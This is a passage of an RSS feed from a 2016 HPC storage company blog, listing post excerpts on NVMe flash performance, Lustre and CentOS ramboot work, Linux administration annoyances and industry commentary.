      <link>https://blog.scalability.org/2016/05/talk-from-kxcon2016-on-hpc-storage-for-bigdata-analytics-is-up/</link>
      <pubDate>Tue, 24 May 2016 17:32:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/talk-from-kxcon2016-on-hpc-storage-for-bigdata-analytics-is-up/</guid>
      <description>See here, which was largely about how to architect high performance analytics platforms, and a specific shout out to our Forte NVMe flash unit, which is currently available in volume starting at $1 USD/GB. Some of the more interesting results from our testing:
 * 24GB/s bandwidth largely insensitive to block size. * 5+ Million IOPs random IO (5+MIOPs) sensitive to block size. * 4k random read (100%) were well north of 5M IOPs.</description>
    </item>
    
    <item>
      <title>Going to #KXcon2016  this weekend to talk #NVMe #HPC #Storage for #kdb #iot and #BigData</title>
      <link>https://blog.scalability.org/2016/05/going-to-kxcon2016-this-weekend-to-talk-nvme-hpc-storage-for-kdb-iot-and-bigdata/</link>
      <pubDate>Wed, 18 May 2016 23:00:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/going-to-kxcon2016-this-weekend-to-talk-nvme-hpc-storage-for-kdb-iot-and-bigdata/</guid>
      <description>This should be fun! This is being organized and run by my friend Lara of Xand Marketing. Excellent talks scheduled, fun bits (raspberry pi based kdb+!!!). Some similarities with the talk I gave this morning, but more of a focus on specific analytics issues relevant for people with massive time series data sets and a need to analyze them. Looking forward to getting out to Montauk &amp;hellip; haven&amp;rsquo;t been there since I did my undergrad at Stony Brook.</description>
    </item>
    
    <item>
      <title>Gave a talk today at #BeeGFS User Meeting 2016 in Germany on #NVMe #HPC #Storage</title>
      <link>https://blog.scalability.org/2016/05/gave-a-talk-today-at-beegfs-user-meeting-2016-in-germany-on-nvme-hpc-storage/</link>
      <pubDate>Wed, 18 May 2016 20:31:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/gave-a-talk-today-at-beegfs-user-meeting-2016-in-germany-on-nvme-hpc-storage/</guid>
      <description>&amp;hellip; through the magic of Google Hangouts. I think they will be posting the talk soon, but you are welcome to view the PDF here.</description>
    </item>
    
    <item>
      <title>Success with rambooted Lustre  v2.8.53 for #HPC #storage</title>
      <link>https://blog.scalability.org/2016/05/success-with-rambooted-lustre-v2-8-53-for-hpc-storage/</link>
      <pubDate>Wed, 11 May 2016 17:42:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/success-with-rambooted-lustre-v2-8-53-for-hpc-storage/</guid>
      <description>[root@usn-ramboot ~]# uname -r 3.10.0-327.13.1.el7_lustre.x86_64 [root@usn-ramboot ~]# df -h / Filesystem Size Used Avail Use% Mounted on tmpfs 8.0G 4.3G 3.8G 53% / [root@usn-ramboot ~]# [root@usn-ramboot ~]# rpm -qa | grep lustre kernel-3.10.0-327.13.1.el7_lustre.x86_64 kernel-tools-3.10.0-327.13.1.el7_lustre.x86_64 kernel-devel-3.10.0-327.13.1.el7_lustre.x86_64 lustre-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-tools-libs-devel-3.10.0-327.13.1.el7_lustre.x86_64 lustre-osd-ldiskfs-mount-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-headers-3.10.0-327.13.1.el7_lustre.x86_64 lustre-osd-ldiskfs-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-tools-libs-3.10.0-327.13.1.el7_lustre.x86_64 lustre-modules-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64  This means that we can run Lustre 2.8.x atop Unison. Still pre-alpha, as I have to get an updated kernel into this, as well as update all the drivers.</description>
    </item>
    
    <item>
      <title>Its not perfect, but we have CentOS/RHEL 7.2 and Lustre integrated into SIOS now</title>
      <link>https://blog.scalability.org/2016/05/its-not-perfect-but-we-have-centosrhel-7-2-and-lustre-integrated-into-sios-now/</link>
      <pubDate>Mon, 09 May 2016 17:48:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/its-not-perfect-but-we-have-centosrhel-7-2-and-lustre-integrated-into-sios-now/</guid>
      <description>Lustre is infamous for its kernel specificity, and it is, sadly, quite problematic to get running on a modern kernel (3.18+). This has implications for quite a large number of things, including whole subsystems with a partial back-porting to earlier kernels &amp;hellip; which quite often misses very critical bits for stability/performance. I am not a fan of back porting for features, I am a fan of updating kernels for features. But that is another issue that I&amp;rsquo;ve talked about in the past.</description>
    </item>
    
    <item>
      <title>reason #31659275 not to use java</title>
      <link>https://blog.scalability.org/2016/05/reason-31659275-not-to-use-java/</link>
      <pubDate>Mon, 09 May 2016 13:11:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/reason-31659275-not-to-use-java/</guid>
      <description>As seen on hacker news linking to an Arstechnica article, this little tidbit. This is the money quote:
I know it seems obvious now to Google and to others, but mebbe &amp;hellip; mebbe &amp;hellip; they should rethink building a platform in a non-open language? I&amp;rsquo;ve talked about OSS type systems in terms of business risk for well more than a decade. OSS software intrinsically changes the risk model, so that you do not have a built in dependency upon another stack that could go away at any moment.</description>
    </item>
    
    <item>
      <title>isn&#39;t this the definition of a Ponzi scheme?</title>
      <link>https://blog.scalability.org/2016/05/isnt-this-the-definition-of-a-ponzi-scheme/</link>
      <pubDate>Mon, 02 May 2016 14:06:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/isnt-this-the-definition-of-a-ponzi-scheme/</guid>
      <description>From this article at the WSJ detailing the deflation of the tech bubble in progress now.
A Ponzi scheme is like this:</description>
    </item>
    
    <item>
      <title>Every now and then you get an eye opener</title>
      <link>https://blog.scalability.org/2016/04/every-now-and-then-you-get-an-eye-opener/</link>
      <pubDate>Thu, 28 Apr 2016 20:21:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/every-now-and-then-you-get-an-eye-opener/</guid>
      <description>This one is while we are conditioning a Forte NVMe unit, and I am running our OS install scripts. Running dstat in a window to watch the overall system &amp;hellip;
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 2 5 94 0 0 0| 0 22G| 218B 484B| 0 0 | 363k 368k 1 4 94 0 0 0| 0 22G| 486B 632B| 0 0 | 362k 367k 1 4 94 0 0 0| 0 22G| 628B 698B| 0 0 | 363k 368k 2 5 92 1 0 0| 536k 110G| 802B 2024B| 0 0 | 421k 375k 1 4 93 2 0 0| 0 22G| 360B 876B| 0 0 | 447k 377k  Wait &amp;hellip; is that 110GB/s (2nd line from bottom, in the writ column) ?</description>
    </item>
    
    <item>
      <title>new SIOS feature: compressed ram image for OS</title>
      <link>https://blog.scalability.org/2016/04/new-sios-feature-compressed-ram-image-for-os/</link>
      <pubDate>Wed, 27 Apr 2016 19:22:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/new-sios-feature-compressed-ram-image-for-os/</guid>
      <description>Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things &amp;hellip; not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes &amp;ldquo;invalid&amp;rdquo; and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.</description>
    </item>
    
    <item>
      <title>there are times</title>
      <link>https://blog.scalability.org/2016/04/there-are-times-2/</link>
      <pubDate>Wed, 20 Apr 2016 21:37:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/there-are-times-2/</guid>
      <description>that try my patience. Usually with poorly implemented filtering tools of one form or another. The SPF mechanism is to provide an anti-spoofing system, which identifies which machines are allowed to send email in your domain name. The tools that purport to test it? Not so good. I get conflicting answers from various tools for a simple SPF record. The online tester (interactive) seems to work and show me my config is working nicely.</description>
    </item>
    
    <item>
      <title>Of course, this means more work ahead</title>
      <link>https://blog.scalability.org/2016/04/of-course-this-means-more-work-ahead/</link>
      <pubDate>Wed, 20 Apr 2016 04:05:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/of-course-this-means-more-work-ahead/</guid>
      <description>Our client code that pulls configuration bits from a boot server works great. But the config it pulls is distribution specific. Where we need to be is distribution/OS agnostic, and set things in a document database. Let the client convert the configuration into something OS specific. This is, to a degree, a solved problem. Indeed, etcd is just a modern reworking of what we did with the client code &amp;hellip; using a fixed client (e.</description>
    </item>
    
    <item>
      <title>Very preliminary RHEL7/CentOS7 SIOS base support</title>
      <link>https://blog.scalability.org/2016/04/very-preliminary-rhel7centos7-sios-base-support/</link>
      <pubDate>Tue, 19 Apr 2016 19:21:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/very-preliminary-rhel7centos7-sios-base-support/</guid>
      <description>This is rebasing our SIOS tech atop RHEL7/CentOS7. Very early stage, pre-alpha, lots of debugger windows open &amp;hellip; but &amp;hellip;
[root@usn-ramboot ~]# cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) [root@usn-ramboot ~]# uname -r 4.4.6.scalable [root@usn-ramboot ~]# df -h / Filesystem Size Used Avail Use% Mounted on tmpfs 8.0G 4.7G 3.4G 59% /  Dracut is giving me a few fits, but I&amp;rsquo;ve finished that side for the most part, and am now into the debugging the post-pivot environment.</description>
    </item>
    
    <item>
      <title>Best practice or random rule ... diagnosing problems and running into annoyances</title>
      <link>https://blog.scalability.org/2016/04/best-practice-or-random-rule-diagnosing-problems-and-running-into-annoyances/</link>
      <pubDate>Mon, 18 Apr 2016 21:53:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/best-practice-or-random-rule-diagnosing-problems-and-running-into-annoyances/</guid>
      <description>As often as not, I&amp;rsquo;ll hear someone talk about a &amp;ldquo;best practice&amp;rdquo; that they are implementing or have implemented. Things that run counter to these &amp;ldquo;best practices&amp;rdquo; are obviously, by definition, &amp;ldquo;not best&amp;rdquo;. What I find sometimes amusing, often alarming, is that the &amp;ldquo;best practices&amp;rdquo; are often disconnected from reality in specific ways. This is not a bash on all best practices, some of them are sane, and real. Like not allowing plain text passwords for logins.</description>
    </item>
    
    <item>
      <title>Attempting, and to some degree, failing, to prevent a user from accruing technical debt</title>
      <link>https://blog.scalability.org/2016/04/attempting-and-to-some-degree-failing-to-prevent-a-user-from-accruing-technical-debt/</link>
      <pubDate>Thu, 07 Apr 2016 14:23:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/attempting-and-to-some-degree-failing-to-prevent-a-user-from-accruing-technical-debt/</guid>
      <description>We strive to do right by our customers. Sometimes this involves telling them unpleasant truths about choices they are going to make in the future, or have made in the past. I try not to overly sugar coat things &amp;hellip; I won&amp;rsquo;t be judgemental &amp;hellip; but I will be frank, and sometimes, this doesn&amp;rsquo;t go over well. During these discussions, I often see people insisting that their goal is X, but the steps Y to get there, will lead them to Z, which is not coincident with X.</description>
    </item>
    
    <item>
      <title>When spam bots attack</title>
      <link>https://blog.scalability.org/2016/04/when-spam-bots-attack/</link>
      <pubDate>Tue, 05 Apr 2016 23:34:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/when-spam-bots-attack/</guid>
      <description>I&amp;rsquo;ve been fixing up a few mail servers to be more discriminating over their connections. And I&amp;rsquo;ve noted that I didn&amp;rsquo;t have any automated tooling to block the spammers. I have lots of tooling to filter and control things. So I wrote a quick log -&amp;gt; ban list generator. Not perfect, but it seems to work nicely. Like I don&amp;rsquo;t have enough to do this week. /sigh Meetings tomorrow starting at 8am.</description>
    </item>
    
    <item>
      <title>Why sticking with distro packages can be (very) bad for your security</title>
      <link>https://blog.scalability.org/2016/04/why-sticking-with-distro-packages-can-be-very-bad-for-your-security/</link>
      <pubDate>Mon, 04 Apr 2016 04:59:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/why-sticking-with-distro-packages-can-be-very-bad-for-your-security/</guid>
      <description>I&amp;rsquo;ve been keeping a variety of systems up to date, updating security and other bits with zealous fervor. Security is never far from my mind, as I&amp;rsquo;ve watched bad practices being used at customers resulting in any number of things &amp;hellip; from minor probes, through (in one case, with a grad student impacted by a windows key logger), taking down a linux cluster, but not before knocking the university temporarily off the internet.</description>
    </item>
    
    <item>
      <title>Not-so-modern file system errors in modern file systems</title>
      <link>https://blog.scalability.org/2016/04/not-so-modern-file-system-errors-in-modern-file-systems/</link>
      <pubDate>Fri, 01 Apr 2016 15:24:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/not-so-modern-file-system-errors-in-modern-file-systems/</guid>
      <description>On a system in heavy production use, using an underlying file system for metadata service, we see this:
kernel: EXT4-fs warning: ext4_dx_add_entry:1992: Directory index full!  Ok, where does this come from? Ext3 had a limit of 32000 directory entries per directory, unless you turned on the dir_index feature. Ext4 theoretically has no limit. Well, its 64000 if you don&amp;rsquo;t use dir_index. Which we do use. Really the feature you want is dir_nlink.</description>
    </item>
    
    <item>
      <title>SIOS-metrics being updated soon with our process table sampler</title>
      <link>https://blog.scalability.org/2016/03/sios-metrics-being-updated-soon-with-our-process-table-sampler/</link>
      <pubDate>Fri, 01 Apr 2016 01:17:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/sios-metrics-being-updated-soon-with-our-process-table-sampler/</guid>
      <description>I needed to look at processes on the machine I&amp;rsquo;d been spending time debugging, in terms of what was running, what the state, the allocations, the IO, etc. Something was causing a hard panic, and it seemed correlated with an application issue. I didn&amp;rsquo;t have a process space sampler, so I wrote one. Takes one sample per second right now (configurable) across the whole process space. Uses 1% CPU or so normally.</description>
    </item>
    
    <item>
      <title>Caught a not-so-cool bug in a hypervisor running on a production machine</title>
      <link>https://blog.scalability.org/2016/03/caught-a-not-so-cool-bug-in-a-hypervisor-running-on-a-production-machine/</link>
      <pubDate>Fri, 01 Apr 2016 00:59:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/caught-a-not-so-cool-bug-in-a-hypervisor-running-on-a-production-machine/</guid>
      <description>Not naming names. Its a good product. It just gives up the ghost when you request 1.5x available memory, and the OS actually tries &amp;hellip; tries &amp;hellip; to fulfill the request. I thought I had set the maximum oversubscription amount to 85% of swap + physical. Yet, along came a nice spike and WHAMMO. Down the machine went. That this was a high visibility production machine, with hard uptime requirements &amp;hellip; not so good.</description>
    </item>
    
    <item>
      <title>Sadly we can&#39;t afford the time or people to go to BioIT world expo next week</title>
      <link>https://blog.scalability.org/2016/03/sadly-we-cant-afford-the-time-or-people-to-go-to-bioit-world-expo-next-week/</link>
      <pubDate>Fri, 01 Apr 2016 00:53:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/sadly-we-cant-afford-the-time-or-people-to-go-to-bioit-world-expo-next-week/</guid>
      <description>Short handed + lots of very near term projects + many things that demand our attention == us pulling out. I wish it was otherwise, but we have limited people bandwidth, and I can&amp;rsquo;t afford 2 days doing booth duty while we have hard deliverables. /sigh Maybe 2017. We&amp;rsquo;ll see. And no, even though HPC on Wall Street is the same time, we aren&amp;rsquo;t going to that either. I like the show, but same issue with timing/people/projects.</description>
    </item>
    
    <item>
      <title>&#34;No, really, we are different than all the others you worked with&#34;</title>
      <link>https://blog.scalability.org/2016/03/no-really-we-are-different-than-all-the-others-you-worked-with/</link>
      <pubDate>Thu, 31 Mar 2016 15:58:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/no-really-we-are-different-than-all-the-others-you-worked-with/</guid>
      <description>Thus ended the plaintive cry of a management consulting hawking their wares, promising us high level meetings with &amp;ldquo;customers&amp;rdquo; with &amp;ldquo;budgets&amp;rdquo; in our space. This isn&amp;rsquo;t to say we don&amp;rsquo;t want more customers, we do. We always need more (and repeat) customers &amp;hellip; this is the nature of our business. What we don&amp;rsquo;t need is pay-for-play. There is no shared risk, no incentive for the management consultant to deliver a set of business, as they are being paid, and that &amp;hellip; the pay for play, is their business.</description>
    </item>
    
    <item>
      <title>It is 2016 ... why am I fighting with LDAP authentication in linux?  Why doesn&#39;t it just work?</title>
      <link>https://blog.scalability.org/2016/03/it-is-2016-why-am-i-fighting-with-ldap-authentication-in-linux-why-doesnt-it-just-work/</link>
      <pubDate>Wed, 30 Mar 2016 14:26:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/it-is-2016-why-am-i-fighting-with-ldap-authentication-in-linux-why-doesnt-it-just-work/</guid>
      <description>Ok &amp;hellip; very long story that boils down to us trying to help a customer out. I am trying to avoid the &amp;ldquo;lets just add another user to /etc/passwd&amp;rdquo; or similar such thing. And they aren&amp;rsquo;t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I&amp;rsquo;ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.</description>
    </item>
    
    <item>
      <title>Ways to not reach me</title>
      <link>https://blog.scalability.org/2016/03/ways-to-not-reach-me/</link>
      <pubDate>Wed, 30 Mar 2016 13:39:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/ways-to-not-reach-me/</guid>
      <description>I&amp;rsquo;ve implemented a very strict policy for inbound phone calls. If I don&amp;rsquo;t recognize the number it goes to voicemail. If its important enough to call me, its important enough to leave me a message. If a call comes in with an unknown number, I won&amp;rsquo;t answer it. It can go through to voicemail. If it comes through with a restricted number, it only goes through to voicemail, though I am starting to think that such calls should be automatically blocked (as in never even given the opportunity to go to voicemail).</description>
    </item>
    
    <item>
      <title>Spent the day fighting with a database that did not honor &#34;be liberal in what you accept&#34;</title>
      <link>https://blog.scalability.org/2016/03/spent-the-day-fighting-with-a-database-that-did-not-honor-be-liberal-in-what-you-accept/</link>
      <pubDate>Mon, 28 Mar 2016 20:50:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/spent-the-day-fighting-with-a-database-that-did-not-honor-be-liberal-in-what-you-accept/</guid>
      <description>To put it bluntly, its escaping not only doesn&amp;rsquo;t match its docs, but appears to be internally inconsistent. I kept getting errors that google couldn&amp;rsquo;t really find much on, other than to suggest they were fixed bugs. I might have something to say on that. Looking forward to the next phase of this work, where we skip this db and focus on kdb+.</description>
    </item>
    
    <item>
      <title>The joys of automated tooling ... or ... catching changes in upstream projects workflows by errors in yours</title>
      <link>https://blog.scalability.org/2016/03/the-joys-of-automated-tooling-or-catching-changes-in-upstream-projects-workflows-by-errors-in-yours/</link>
      <pubDate>Sun, 20 Mar 2016 23:03:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/the-joys-of-automated-tooling-or-catching-changes-in-upstream-projects-workflows-by-errors-in-yours/</guid>
      <description>We have an automated build process for our boot images. It is actually quite good, allowing us to easily integrate many different capabilities with it. These capabilities are usually encapsulated in various software stacks that provide specific functionality. Most of these stacks follow pretty well defined workflows. For a number of reasons, we find building from source generally easier than package installation, as there are often some, well, effectively random (and often poor) choices in build options/file placement in the package builds.</description>
    </item>
    
    <item>
      <title>Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage</title>
      <link>https://blog.scalability.org/2016/03/not-even-breaking-a-sweat-10gbs-write-to-single-node-forte-unit-over-100gb-net-realhyperconverged-hpc-storage/</link>
      <pubDate>Tue, 15 Mar 2016 17:54:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/not-even-breaking-a-sweat-10gbs-write-to-single-node-forte-unit-over-100gb-net-realhyperconverged-hpc-storage/</guid>
      <description>TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system &amp;hellip;</description>
    </item>
    
    <item>
      <title>VC landscape changing:   Intel Capital on the market</title>
      <link>https://blog.scalability.org/2016/03/vc-landscape-changing-intel-capital-on-the-market/</link>
      <pubDate>Mon, 14 Mar 2016 02:38:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/vc-landscape-changing-intel-capital-on-the-market/</guid>
      <description>Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They&amp;rsquo;ve been in the thick of many interesting companies, though usually outside of Intel&amp;rsquo;s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups &amp;hellip; new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.</description>
    </item>
    
    <item>
      <title>Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!</title>
      <link>https://blog.scalability.org/2016/03/massive-unapologetic-storage-firepower-part-4-on-the-test-track-with-a-forte-unit-vaaaaroooooommmmmmm/</link>
      <pubDate>Sun, 13 Mar 2016 18:28:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/massive-unapologetic-storage-firepower-part-4-on-the-test-track-with-a-forte-unit-vaaaaroooooommmmmmm/</guid>
      <description>I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.</description>
    </item>
    
    <item>
      <title>Just another day, debugging someone&#39;s installer</title>
      <link>https://blog.scalability.org/2016/03/just-another-day-debugging-someones-installer/</link>
      <pubDate>Fri, 11 Mar 2016 15:38:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/just-another-day-debugging-someones-installer/</guid>
      <description>I like the installers that attempt (and then fail) to calculate what they need, and generate installation target names programmaticlly. I know &amp;hellip; I know&amp;hellip; its an attempt to reduce the level of pain for some folks, as the algorithm works for some sets of inputs. But not mine. And mine are valid. What we need is an &amp;ndash;I_know_what_the_heck_I_am_asking_for_so_please_just_do_the_install switch. Or, I have their installer (thankfully non-terrible perl code) up in an editor to see if I can find the offensive part, and then I can patch it (and send them the patch).</description>
    </item>
    
    <item>
      <title>What a difference a CEO makes</title>
      <link>https://blog.scalability.org/2016/03/what-a-difference-a-ceo-makes/</link>
      <pubDate>Mon, 07 Mar 2016 21:14:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/what-a-difference-a-ceo-makes/</guid>
      <description>So Microsoft will be starting to produce Linux software. This would never have happened under the previous CEO. With this change, Microsoft&amp;rsquo;s addressable market just grew fairly significantly for this product. Of course, there are ways for them to mess this up. Such as if they have features only available under windows. That would rather permanently consign this product to the dustbin of history. This said, I am hopeful that this CEO gets it, and will make sure that the changes Microsoft needs to make, are, in fact, made.</description>
    </item>
    
    <item>
      <title>One of those days where you search for information on a problem</title>
      <link>https://blog.scalability.org/2016/03/one-of-those-days-where-you-search-for-information-on-a-problem/</link>
      <pubDate>Thu, 03 Mar 2016 21:21:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/one-of-those-days-where-you-search-for-information-on-a-problem/</guid>
      <description>and find that you wrote on a mailing list almost half a decade ago about the problem, that it hasn&amp;rsquo;t been fixed. This is a little sad.</description>
    </item>
    
    <item>
      <title>Fixed the asymmetric problem by moving to a different switch/network</title>
      <link>https://blog.scalability.org/2016/03/fixed-the-asymmetric-problem-by-moving-to-a-different-switchnetwork/</link>
      <pubDate>Wed, 02 Mar 2016 05:47:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/fixed-the-asymmetric-problem-by-moving-to-a-different-switchnetwork/</guid>
      <description>Long story but it was a time sensitive POC bug. I like the switch I was using, but we needed this up ASAP. Customer was waiting. So I yanked all the 40GbE cards from the servers, put in multiport 10GbE, set up 802.3ad LAGs. Then moved to the Arista in the lab (great switch BTW). Its been years since I set one up, so out came the manual. Read up on setting up the LAGs and port channels &amp;hellip; I had forgotten why I liked using them so much.</description>
    </item>
    
    <item>
      <title>Cool asymmetric network performance happened to mess up a customer benchmark</title>
      <link>https://blog.scalability.org/2016/02/cool-asymmetric-network-performance-happened-to-mess-up-a-customer-benchmark/</link>
      <pubDate>Mon, 29 Feb 2016 04:52:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/cool-asymmetric-network-performance-happened-to-mess-up-a-customer-benchmark/</guid>
      <description>A bunch of Unison systems, a 40 GbE network interconnecting them, and a bunch of client nodes on 40GbE -&amp;gt; 4x 10GbE links (to accomodate enough clients for the load testing). 40GbE &amp;lt; -&amp;gt; 40GbE works great. Full bandwidth, only minor oddities (single thread performance around 27Gb/s, need multiple threads to hit 40). 10GbE &amp;lt; -&amp;gt; 10GbE works great. Full bandwidth, nothing odd. 10GbE -&amp;gt; 40GbE works great, get about the expected bandwidth (10GbE).</description>
    </item>
    
    <item>
      <title>Interesting ... so will they be sued for patents</title>
      <link>https://blog.scalability.org/2016/02/interesting-so-will-they-be-sued-for-patents/</link>
      <pubDate>Thu, 18 Feb 2016 20:46:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/interesting-so-will-they-be-sued-for-patents/</guid>
      <description>Turns out next Ubuntu is fully baking in ZFS into the kernel and distributing it. This seems directly contrary to the licensing CDDL vs GPL, and chances are some folks will be unhappy with it. The big question is, will the IP holders sue. Because if they don&amp;rsquo;t, they may actually have given up their right to sue. Or has Canonical obtained a license to distribute. This is my understanding as I am not a lawyer, so I can&amp;rsquo;t really be sure of this (and I&amp;rsquo;d recommend you ask one if you are not sure).</description>
    </item>
    
    <item>
      <title>New tool to help visualize /proc/interrupts and info in /proc/irq/$INT/</title>
      <link>https://blog.scalability.org/2016/02/new-tool-to-help-visualize-procinterrupts-and-info-in-procirqint/</link>
      <pubDate>Wed, 03 Feb 2016 20:39:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/new-tool-to-help-visualize-procinterrupts-and-info-in-procirqint/</guid>
      <description>This is a start, not ready for release yet, but already useful as a diagnostic tool. I wanted to see how my IRQs were laid out, as this has been something of a persistent problem. I&amp;rsquo;ve built some intelligence into our irqassign.pl tool, but I need a way to see where the system is investing most of its interrupts. I omit (on purpose) IRQs that have been assigned, but have generated no interrupts.</description>
    </item>
    
    <item>
      <title>Not sufficiently caffeinated for technical work today</title>
      <link>https://blog.scalability.org/2016/02/not-sufficiently-caffeinated-for-technical-work-today/</link>
      <pubDate>Tue, 02 Feb 2016 16:16:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/not-sufficiently-caffeinated-for-technical-work-today/</guid>
      <description>I just spent 30 minutes trying to figure out why the 32 bit q process would run on one machine, while the identical tree and config would fail with a license expired on my desktop (development box). Turns out one should check for an old license file in one&amp;rsquo;s home directory. /sigh I think I need to send an RFE for an &amp;lsquo;&amp;ndash;low-coffee-mode&amp;rsquo; option.</description>
    </item>
    
    <item>
      <title>Not a fan of device mapper in Linux</title>
      <link>https://blog.scalability.org/2016/02/not-a-fan-of-device-mapper-in-linux/</link>
      <pubDate>Mon, 01 Feb 2016 18:10:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/not-a-fan-of-device-mapper-in-linux/</guid>
      <description>Yeah, I know. It brings all manner of capabilities with it. Its just the cost of these capabilities, when combined with other tools, like, say, Docker, that make me not want to use it. To wit:
root@ucp-01:~# ls -alF /var/lib/docker/devicemapper/devicemapper/ total 52508 drwx------ 2 root root 80 Jan 29 22:38 ./ drwx------ 4 root root 80 Jan 29 22:38 ../ -rw------- 1 root root 107374182400 Jan 29 22:39 data -rw------- 1 root root 2147483648 Jan 29 22:39 metadata root@ucp-01:~# ls -halF /var/lib/docker/devicemapper/devicemapper/ total 52M drwx------ 2 root root 80 Jan 29 22:38 .</description>
    </item>
    
    <item>
      <title>Radio Free HPC is (as usual) worth a listen</title>
      <link>https://blog.scalability.org/2016/01/radio-free-hpc-is-as-usual-worth-a-listen/</link>
      <pubDate>Fri, 29 Jan 2016 03:42:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/radio-free-hpc-is-as-usual-worth-a-listen/</guid>
      <description>Good wrap up of last years trends, this week at InsideHPC Radio Free HPC podcast. We get a small mention around 10:50 or so. Thats not why its an especially good listen. The team arrived at many of the same conclusions we did last year, which is why we brought out Forte, and we have some additional products planned in that line for later on in the year. Basically NVM and variants, NVMe, etc.</description>
    </item>
    
    <item>
      <title>When infinite resources aren&#39;t, and why software assumes they are infinite</title>
      <link>https://blog.scalability.org/2016/01/when-infinite-resources-arent-and-why-software-assumes-they-are-infinite/</link>
      <pubDate>Wed, 27 Jan 2016 18:48:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/when-infinite-resources-arent-and-why-software-assumes-they-are-infinite/</guid>
      <description>We&amp;rsquo;ve got customers with very large resource machines. And software that sees all those resources and goes &amp;ldquo;gimme!!!!&amp;rdquo;. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that &amp;ldquo;there must be something wrong with the hardware&amp;rdquo;, when I see all the messages in console logs being pulled in from ICL saying &amp;ldquo;zOMG I am out of ram &amp;hellip;.</description>
    </item>
    
    <item>
      <title>&#34;Unexpected&#34; cloud storage retrieval charges, or &#34;RTFM&#34;</title>
      <link>https://blog.scalability.org/2016/01/unexpected-cloud-storage-retrieval-charges-or-rtfm/</link>
      <pubDate>Mon, 18 Jan 2016 13:14:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/unexpected-cloud-storage-retrieval-charges-or-rtfm/</guid>
      <description>An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon&amp;rsquo;s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.</description>
    </item>
    
    <item>
      <title>Container jutsu</title>
